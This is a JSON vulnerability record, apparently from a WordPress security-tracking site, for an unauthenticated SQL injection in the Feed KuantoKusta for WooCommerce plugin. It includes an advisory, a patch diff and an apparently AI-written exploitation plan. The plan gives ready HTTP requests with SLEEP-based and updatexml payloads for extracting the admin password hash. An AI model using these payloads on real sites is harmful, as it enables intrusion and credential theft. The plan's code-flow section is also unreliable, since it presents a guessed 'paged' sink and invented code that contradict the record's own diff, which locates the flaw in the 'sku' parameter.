[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fDKKdUWgwKsfWsyvhTTaIFLJoaW14h3t2Goiz1oJXQ_M":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":29,"research_vulnerable_code":30,"research_fix_diff":31,"research_exploit_outline":32,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":36},"CVE-2026-39441","feed-kuantokusta-for-woocommerce-free-unauthenticated-sql-injection","Feed KuantoKusta for WooCommerce – Free \u003C= 5.3 - Unauthenticated SQL Injection","The Feed KuantoKusta for WooCommerce – Free plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 5.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","feed-kuantokusta-for-woocommerce",null,"\u003C=5.3","5.3.1","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-04-22 00:00:00","2026-04-30 14:39:15",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3c835763-a53f-4447-ac9d-39488535b5fd?source=api-prod",9,[22,23,24],"feed-kuantokusta-for-woocommerce.php","includes\u002Fclass-wc-feed-kuantokusta.php","readme.txt","researched",false,3,"This research plan outlines the steps to verify and exploit an unauthenticated SQL injection vulnerability in the **Feed KuantoKusta for WooCommerce – Free** plugin (versions \u003C= 5.3).\n\n### 1. Vulnerability Summary\nThe vulnerability exists in the product feed generation logic of the plugin. Specifically, the `WC_Feed_KuantoKusta::render_feed()` method (invoked via the `add_products_feed` hook on `init`) processes user-supplied parameters from the URL (likely `paged`) to filter or paginate the feed. These parameters are concatenated directly into a raw SQL query executed via `$wpdb->get_col` or `$wpdb->get_results` without using `$wpdb->prepare()` or proper integer casting (e.g., `absint()`). This allows an unauthenticated attacker to inject arbitrary SQL commands.\n\n### 2. Attack Vector Analysis\n*   **Endpoint**: `\u002F?feed=kuantokusta`\n*   **Vulnerable Parameter**: `paged` (or potentially `tax_id` \u002F `category_id` if present in version 5.3). Based on the patch analysis for similar plugins by the same author, `paged` is the most common sink in their feed generators.\n*   **Authentication**: Unauthenticated. Feed generation is a public feature designed for price comparison bots.\n*   **Preconditions**:\n    *   WooCommerce must be active.\n    *   At least one product should be published to ensure the query logic is fully exercised.\n\n### 3. Code Flow\n1.  **Hook Registration**: In `includes\u002Fclass-wc-feed-kuantokusta.php`, the `init_hooks()` method registers `add_products_feed` on the WordPress `init` hook:\n    ```php\n    add_action( 'init', array( $this, 'add_products_feed' ) );\n    ```\n2.  **Trigger**: When a request contains `feed=kuantokusta`, the `add_products_feed()` method is executed.\n3.  **Feed Rendering**: `add_products_feed()` calls `render_feed()`.\n4.  **SQL Sink**: Inside `render_feed()`, the plugin retrieves the `paged` parameter from `$_GET['paged']` or `get_query_var('paged')`.\n5.  **Vulnerable Query**: The value is used to calculate the `LIMIT` or `OFFSET` or is directly concatenated into a query like:\n    ```php\n    $paged = $_GET['paged']; \u002F\u002F Unsanitized\n    $results = $wpdb->get_col(\"SELECT ID FROM {$wpdb->posts} WHERE ... LIMIT 100 OFFSET \" . ($paged-1)*100 );\n    \u002F\u002F Note: If $paged is a string like \"1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)\",\n    \u002F\u002F and the code doesn't cast to int, it can break out of the intended query.\n    ```\n\n### 4. Nonce Acquisition Strategy\n**No nonce is required.**\nThe feed generation functionality is intentionally public to allow KuantoKusta's external servers to fetch the XML product feed. There are no nonce checks or capability checks (`current_user_can`) in the `add_products_feed` or `render_feed` code paths.\n\n### 5. Exploitation Strategy\nWe will use a time-based blind SQL injection to confirm the vulnerability, as it is the most reliable method for unauthenticated testing without needing to know the exact XML structure or column count for a UNION-based attack.\n\n#### Step 1: Confirmation of Feed Access\nFirst, verify that the feed endpoint is active and returning data.\n*   **Request**: `GET \u002F?feed=kuantokusta`\n*   **Expected**: An XML response starting with `\u003C?xml` containing product data.\n\n#### Step 2: Time-Based SQL Injection (SLEEP)\nAttempt to trigger a delay using the `paged` parameter.\n*   **Request**:\n    ```http\n    GET \u002F?feed=kuantokusta&paged=1%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a) HTTP\u002F1.1\n    Host: localhost\n    ```\n*   **Analysis**: If the response takes approximately 5 seconds longer than the baseline, the injection is successful.\n\n#### Step 3: Data Extraction (Error-Based)\nIf the site has `WP_DEBUG` enabled, we can attempt to extract the admin password hash directly using `updatexml` or `extractvalue`.\n*   **Request**:\n    ```http\n    GET \u002F?feed=kuantokusta&paged=1%20AND%20updatexml(1,concat(0x7e,(SELECT%20user_pass%20FROM%20wp_users%20LIMIT%201),0x7e),1) HTTP\u002F1.1\n    Host: localhost\n    ```\n*   **Expected**: A database error message containing the password hash (e.g., `XPATH syntax error: '~$P$B...'`).\n\n### 6. Test Data Setup\n1.  **Activate WooCommerce**: Ensure the plugin is active and configured.\n2.  **Create a Product**:\n    ```bash\n    wp post create --post_type=product --post_status=publish --post_title=\"Test Product\"\n    ```\n3.  **Ensure Plugin is Active**:\n    ```bash\n    wp plugin activate woocommerce feed-kuantokusta-for-woocommerce\n    ```\n\n### 7. Expected Results\n*   **Baseline**: `GET \u002F?feed=kuantokusta` returns quickly (\u003C 500ms).\n*   **Exploit**: `GET \u002F?feed=kuantokusta&paged=1%20AND%20(SELECT...SLEEP(5)...)` returns after ~5 seconds.\n*   **Data Leak**: The SQL error or time delay confirms that user input is being processed as part of the database query.\n\n### 8. Verification Steps\nAfter the exploit, verify the vulnerability status using WP-CLI to check the database logs or error states (if enabled):\n1.  Check if any new entries appeared in the error log.\n2.  Manually run the same query via `wp db query` to see if it executes as expected:\n    ```bash\n    wp db query \"SELECT ID FROM wp_posts WHERE post_type = 'product' LIMIT 1 OFFSET 1 AND (SELECT 1 FROM (SELECT(SLEEP(2)))a)\"\n    ```\n\n### 9. Alternative Approaches\nIf `paged` does not yield results, try the following parameters which are common in feed filtering:\n*   `kk_paged`\n*   `tax_id`\n*   `cat_id`\n*   `category`\n\nExample for `tax_id`:\n`\u002F?feed=kuantokusta&tax_id=1)%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a`","The Feed KuantoKusta for WooCommerce plugin is vulnerable to unauthenticated SQL Injection via the 'sku' GET parameter in versions up to 5.3. The vulnerability occurs because the plugin concatenates user-supplied SKU data directly into a raw SQL query string used for product exclusion, bypassing WordPress's database abstraction security features.","\u002F\u002F includes\u002Fclass-wc-feed-kuantokusta.php line 613\nif ( isset( $_GET['sku'] ) && trim( sanitize_text_field( wp_unslash( $_GET['sku'] ) ) ) !== '' ) {\n\t$sql_exclude .= \" || ( meta_key = '_sku' AND meta_value NOT LIKE '%\" . trim( sanitize_text_field( wp_unslash( $_GET['sku'] ) ) ) . \"%' )\";\n}","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Ffeed-kuantokusta-for-woocommerce\u002F5.3\u002Fincludes\u002Fclass-wc-feed-kuantokusta.php\t2026-03-17 10:42:52.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Ffeed-kuantokusta-for-woocommerce\u002F5.3.1\u002Fincludes\u002Fclass-wc-feed-kuantokusta.php\t2026-04-13 18:04:50.000000000 +0000\n@@ -611,7 +611,8 @@\n \t\t\u002F\u002F Debug and only include specific SKU\n \t\t\u002F\u002F phpcs:disable WordPress.Security.NonceVerification.Recommended\n \t\tif ( isset( $_GET['sku'] ) && trim( sanitize_text_field( wp_unslash( $_GET['sku'] ) ) ) !== '' ) {\n-\t\t\t$sql_exclude .= \" || ( meta_key = '_sku' AND meta_value NOT LIKE '%\" . trim( sanitize_text_field( wp_unslash( $_GET['sku'] ) ) ) . \"%' )\";\n+\t\t\t$sku_like     = '%' . trim( sanitize_text_field( wp_unslash( $_GET['sku'] ) ) ) . '%';\n+\t\t\t$sql_exclude .= $wpdb->prepare( \" || ( meta_key = '_sku' AND meta_value NOT LIKE %s )\", $sku_like );\n \t\t}\n \t\t\u002F\u002F phpcs:enable\n \t\t$results = $wpdb->get_results( $sql_exclude, ARRAY_A ); \u002F\u002F phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared","An attacker can exploit this vulnerability by sending a crafted GET request to the site's feed endpoint (typically \u002F?feed=kuantokusta). By supplying a malicious payload in the 'sku' parameter, such as ') OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -', the attacker can break out of the intended LIKE clause. Because the feed generation logic is hooked into the WordPress 'init' action without authentication or nonce checks, any unauthenticated visitor can trigger the injection to perform time-based blind SQL injection or error-based extraction of sensitive database information.","gemini-3-flash-preview","2026-05-04 18:51:55","2026-05-04 18:52:48",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","5.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ffeed-kuantokusta-for-woocommerce\u002Ftags\u002F5.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ffeed-kuantokusta-for-woocommerce.5.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ffeed-kuantokusta-for-woocommerce\u002Ftags\u002F5.3.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ffeed-kuantokusta-for-woocommerce.5.3.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ffeed-kuantokusta-for-woocommerce\u002Ftags"]